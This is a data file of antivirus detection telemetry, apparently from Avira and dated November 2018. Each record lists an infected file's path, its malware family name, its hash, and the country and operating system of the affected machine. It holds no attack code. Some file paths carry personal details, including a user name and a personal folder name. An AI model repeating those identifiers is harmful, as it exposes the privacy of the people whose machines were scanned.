  Row(detection=Row(filename='kact2.exe', filepath='D:\\Mihaela (my documents)\\Kx602212_UPD_Signed_en\\32bit\\XP and newer\\KACT2\\KACT2.exe', filesize=1024000, name='W32/Sality.Y.#M1.#R1'), hash='30fae1a442acf6b7fe61ed7ee75dc54f055676fe45de4c760cec41918a89405c', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ไหมไทย ใจตะวัน - ชุดนักสู้หัวใจเซิ้ง.exe', filepath='E:\\music\\music\\ลูกทุ่ง โดนจาย\\ไหมไทย ใจตะวัน - ชุดนักสู้หัวใจเซิ้ง\\ไหมไทย ใจตะวัน - ชุดนักสู้หัวใจเซิ้ง.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='1a7eee5eeac20a75ec2ddd680ae478bdd7928d74e3707c78f29dc84f1b37b3d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T09:11:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160022-edf493ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160022-EDF493CE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dcim.exe', filepath='E:\\DCIM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpqdirec.exe', filepath='\\\\?\\C:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\Hpqdirec.exe', filesize=960000, name='W32/Sality.AT.#M1.#R1'), hash='4e48d53297be073b4e003c906207e69ded2a507cfc02a83b5903027a1c207af0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:03:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='photoshop_lessons.exe', filepath='H:\\ORG\\برامج\\photoshop_lessons.exe', filesize=1024000, name='W32/Virut.Gen.#M1.#R1'), hash='2143d4d48849cbb2a73eebc6bfb51c426486b6313b41d5525c5d92f01944b69f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154942-82319ef9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154942-82319EF9', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1744000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43c5eeb2b7e21131937b9ea0ed12cf81e15a9d31d5c0a03baba07fe0b4397a86', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T18:38:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smk3.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\SMK3\\SMK3.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farnfdp.exe', filepath='D:\\Backup\\Windows\\system32\\spool\\drivers\\w32x86\\epsonepson_stylus_tx49ee\\E_FARNFDP.EXE', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='01182f320d17b5e8278062b5081ad55bd32c65e3e41221348c8846f913cffa42', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='العاب.exe', filepath='D:\\العاب\\العاب.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='0c744eeabe3b9d51114647b7d603de2bcd16f14ac8aaa6b0f5dc665895bdf719', metadata=Row(cmdline='\\\\\\/connectToHost ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Launcher\\Avira.Systray.exe', parentsize=307184, timestamp='2018-11-01T22:30:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161441-e75be933', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161441-E75BE933', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='8515fb47c385fe17a5c97cfda5fc0b26f97b7c7b1c8e444d9af2c70bfb862c33', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:14:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ประมูลซื้อหรือจ้างทั่วไป.exe', filepath='\\\\?\\D:\\รังสิตใต้\\01-งานที่สำนัก ปี ก่อน-2554\\Cข้อมูลทั่วไป\\ข้อมูลรังสิตใต้-พี่นิดปี 2552\\SPEC50\\9พย.49_เอ\\(8)แนวทางประกวดราคา\\แนวทางประกวดราคาทางอิเล็กทรอนิกส์(ฉบับสมบูรณ์)\\ประมูลซื้อหรือจ้างทั่วไป\\ประมูลซื้อหรือจ้างทั่วไป.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R1795'), hash='a9c16e3645228748ed3249a4ba85bc57fbb04fa9bdeb4cad65a8c888ad9d6841', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:06:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:26:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\Movies Toolbar\\Datamngr\\DatamngrUI.exe.vir', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='7a0dcdb58d4e5bbf303af3c6c5f9063ecfeb2e404d5797577234cd26d8be0b56', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:39:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111558-34d38c4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07bccc1b\\AVSCAN-20181101-111546-32ECAF09\\AVSCAN-20181101-111558-34D38C4A', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:15:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsyF707.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T08:18:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005331-6fe062ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_50ed1053\\AVSCAN-20181102-005006-50150604\\AVSCAN-20181102-005331-6FE062EA', filesize=260000, name='ADWARE/BrowseFox.Gen7.#M300.#R300184'), hash='bc614fb7071427ad6ccdb246eff24926482ba8b29c2fd94297fe5b9508c97f2b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:49:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e706743045769ded74de21c7178d1efcc07eddf5471b90d916a92aef6021ceb0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\E706743045769DED74DE21C7178D1EFCC07EDDF5471B90D916A92AEF6021CEB0', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='e706743045769ded74de21c7178d1efcc07eddf5471b90d916a92aef6021ceb0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsi83B7.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T01:33:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152156-baf4560e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e694a98\\AVSCAN-20181101-152108-B361BDAE\\AVSCAN-20181101-152156-BAF4560E', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='99e802a254768b58e1b71de1966b4411b0eb2007f33ccfbced3b857646805822', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:49:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214825-ed333690', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_632bd233\\AVSCAN-20181101-214038-A3F4827E\\AVSCAN-20181101-214825-ED333690', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='92c50ba8d062d6ede7bdbfb9f1fd403ce323fbc58348d5e8d13f8ebb9506ce2b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163651-a98daf5e', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163613-A17CA89E\\AVSCAN-20181101-163651-A98DAF5E', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:40:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='c046c9195a9ff385b2b09009e2de1ecef6f41d3896568fb56928dd557cc89277', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:14:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files (x86)\\Avira\\AntiVir Desktop\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:05:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105957-a72f769d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105957-A72F769D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-055215-3f092bec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0714c40\\AVSCAN-20181101-055040-315926D0\\AVSCAN-20181101-055215-3F092BEC', filesize=192000, name='TR/Dropper.Gen.#M1.#R1'), hash='a5d484184ac1e495dd72cc2cffab595c03ec483e95423b36b66d82e151c95b2b', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:52:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-232533-44880dbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4552d08\\AVSCAN-20181031-231129-DDA39FCC\\AVSCAN-20181031-232533-44880DBF', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:25:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='F:\\โปรเเกรมคอม 1\\โปรเเกรมทางด้านเอกสาร\\Microsoft Office 2003-2007-2010-2013 AIO + Crack\\autorun.exe', filesize=7232000, name='W32/Neshta.A.#M1.#R1'), hash='8d501d078233b52c9dd59bdb2d20ff2799bf3463e06619c419b7f58d961262c6', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675384, timestamp='2018-11-01T06:00:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110511-66eb88e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181101-110418-5CCF95A5\\AVSCAN-20181101-110511-66EB88E6', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:05:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\zcash\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:06:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsaC3AD.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:27:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-223531-7a8a5c3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_08bc9354\\AVSCAN-20181101-201130-5CBB0005\\AVSCAN-20181101-223531-7A8A5C3A', filesize=32952000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='991e00c0851258b4cb32d31e56939b31f31c4f1d4e7fd97a3315621bffaf1485', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eval_rech_sc_infir_maieutik_article_3.exe', filepath='\\?\\D:\\eval_rech_sc_infir_maieutik_article_3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='388a734e1ec41559c2578c82242cd984b2559f81e04811552762fa1d5a4a18ed', metadata=Row(cmdline=None, country='BF', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zuma.exe', filepath='E:\\popcap 100\\All In One Arcade\\AutoPlay\\Docs\\Zuma\\zuma.exe', filesize=1684000, name='W32/Sality.AT.#M1.#R1'), hash='33c3145e0bb97586b94c212756a4b1337b9a311b3da4d7256c1dbe26e9d7d455', metadata=Row(cmdline='\\\\\\/onboot', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Tonec\\IDMan.exe', parentsize=4105328, timestamp='2018-11-01T02:56:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005001-2021ec6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d28be967\\AVSCAN-20181102-004937-1CF6E7E2\\AVSCAN-20181102-005001-2021EC6A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:50:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:43:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215306-f02f7a95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e8942c23\\AVSCAN-20181101-214228-937D9B6E\\AVSCAN-20181101-215306-F02F7A95', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:53:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1b9506415106d9ed4db51f2e16811fe13544759f42137382e777077d0e5d572f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1B9506415106D9ED4DB51F2E16811FE13544759F42137382E777077D0E5D572F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1b9506415106d9ed4db51f2e16811fe13544759f42137382e777077d0e5d572f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:20:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:39:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cam.dll', filepath='C:\\Users\\X\\Desktop\\r.a.t.s\\NjRat 0.7d Golden Edition\\Plugin\\cam.dll', filesize=64000, name='HEUR/AGEN.1032945.#M1.#R1'), hash='5f00cda5808e3fd126d452708308ddee6556cb83adaccd02efe83654a40fc641', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:04:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0119624.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0119624.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:38:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0007e79b', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp0007e79b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:44:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\USERS\\X\\APPDATA\\ROAMING\\MICROSOFT\\WINDOWS\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='36735439ef45a4112fe0aa143fbf9e2bac0c0b2e0f63d08db9d8c0d42a6968b2', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T01:33:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091231-af426cc5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_71ea0462\\AVSCAN-20181101-084920-FD89B279\\AVSCAN-20181101-091231-AF426CC5', filesize=64000, name='TR/Trash.Gen.#M1.#R1'), hash='349761a4df48cc9661854ba02e5e290f45bc66bf2624eeabb633208c0e50465a', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T09:09:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allfake.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-D5GS0.tmp\\AllFake.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:22:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='getdatafat.exe', filepath='K:\\HBCD\\Programs\\GETDATAFAT.EXE', filesize=64000, name='TR/Siggen.64000.6.#M1.#R1'), hash='3f8ad9886492f19d0be4d277a4600ae8044d3bda4f0d836239df36f6e3c4bd3a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='__----_----_-_--____-__-_---__----_--_-___--__---__.{fa4a80de-1995-4e73-a45f-662adc38d09e}', filepath='j:\\\xa0\\__----_----_-_--____-__-_---__----_--_-___--__---__.{FA4A80DE-1995-4E73-A45F-662ADC38D09E}', filesize=7464000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='40827e6a2c3400dca159b126c2c3f2352ab1871a3302aca7589fa6b07af8bdcf', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:49:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5420.9141\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5420.9141\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:58:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1371c5cbfbf5b62dab40009c89cc11cc3de1a7819bc4224ab071353397efbe64', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\1371C5CBFBF5B62DAB40009C89CC11CC3DE1A7819BC4224AB071353397EFBE64', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='1371c5cbfbf5b62dab40009c89cc11cc3de1a7819bc4224ab071353397efbe64', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:56:12Z'), dt=datetime.date(2018, 11, 1)),
